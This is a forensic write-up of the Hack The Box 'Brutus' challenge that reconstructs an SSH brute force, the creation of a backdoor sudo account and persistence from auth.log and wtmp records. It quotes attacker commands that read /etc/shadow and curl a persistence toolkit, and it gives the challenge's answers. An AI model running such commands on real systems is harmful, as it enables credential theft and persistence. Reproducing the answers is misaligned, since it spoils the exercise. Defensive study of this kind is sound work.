HTB Sherlock - Brutus
Author: Alcidius
March 04, 2026
Scenario
In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
Summary: An attacker brute-forced their way into a Confluence server over SSH, then used that foothold to escalate privileges and establish persistence.
Challenge Info
| Field | Details |
|---|---|
| Category | DFIR |
| Difficulty | Very Easy |
Investigation
Initial Analysis
The provided artefact ZIP contains:
├── Brutus
│ ├── auth.log
│ ├── utmp.py
│ ├── wtmp
│ └── wtmp.csv
I started looking at the authentication which clearly showed failed logins indicating a brute force attack. The attempted logins follow each other up in quick succession indicating an automated process. The IP this brute force attack was originating from 65.2.161.68.
Successful login
The first successful login occurred at 2024-03-06 06:32:01 UTC time, opening a session that was immediately closed. 43 seconds later, a new login occurred with session number 37. This behavior is highly likely a manual login with credentials gained in the brute force attack.
Persistence
The attacker created an account to the machine called cyberjunkie which subsequently was added to the sudo group. Afterwards the attacker logged out ending session 37 and logging into the persistence user with session 49.
Command & Control
Within session 49 under user cyberjunkie, the /etc/shadow file is read using cat. Afterwards the user executed the command curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh, which is a persistence toolkit.
Questions & Answers
Q1: Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?
Answer: 65.2.161.68
Reasoning: The IP of which frequent failed logins occured was 65.2.161.68. These failed logins stopped after one successful attempt.
Q2: The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?
Answer: root
Reasoning: After 43 seconds of a successful brute force attempt that was immediately closed, another login occurred with user root.
Q3: Identify the UTC timestamp when the attacker logged in manually to the server and established a terminal session to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.
Answer: 2024-03-06 06:32:45
Reasoning: Within the WTMP artefact, which keeps track of historical login and logout occurrences. It was found that the root user logged in from the malicious IP address at the above mentioned time. The WTMP artefact was parsed with the provided utmp.py file.
Q4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Answer: 37
Reasoning: The login which occurred at 2024-03-06 06:32:44-45 states New session 37 of user root. This log provides the answer to the question.
Q5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
Answer: cyberjunkie
Reasoning: Within the logs, a new user was created with the name cyberjunkie at 2024-03-06 06:34:18.
Q6: What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?
Answer: T1136.001
Reasoning: MITRE ATT&CK states that “Adversaries may create an account to maintain access to victim systems”[1].
Q7: What time did the attacker’s first SSH session end according to auth.log?
Answer: 2024-03-06 06:37:24
Reasoning: Session 37 closed at the timestamp mentioned above.
Q8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Reasoning: Two commands were executed, the first one: cat /etc/shadow, which is not a command to escalate privileges. The command mentioned above however, will download linper.sh which is a persistence toolkit.
Used logs
| Timestamp | Details | Remarks |
|---|---|---|
| 2024-03-06 06:32:01 | pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0) | Successful brute force login |
| 2024-03-06 06:32:44 | pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0) | attacker login |
| 2024-03-06 06:32:44 | systemd-logind[411]: New session 37 of user root | Created session associated with the login |
| 2024-03-06 06:34:18 | new group: name=cyberjunkie, GID=1002 | Creation of user cyberjunkie |
| 2024-03-06 06:35:15 | add ‘cyberjunkie’ to group ‘sudo’ | Added cyberjunkie to sudoers group |
| 2024-03-06 06:37:24 | Session 37 logged out. Waiting for processes to exit. | Closing of the attacker’s session |
| 2024-03-06 06:37:34 | New session 49 of user cyberjunkie. | Attacker login in newly created user |
| 2024-03-06 06:37:57 | sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow | Attacker reads shadow file |
| 2024-03-06 06:39:38 | sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh | acquisition of persistence toolkit |
Key Takeaways
- Brute Force Recognition is mostly recognized by the amount of login attempts that occur in a relatively quick succession.
- Persistence can be gained by creating a new user on the system.
- Wtmp files can actually be very useful when tracking session related events.
Footnotes
- Footnote 1 — MITRE ATT&CKs description of
T1136.001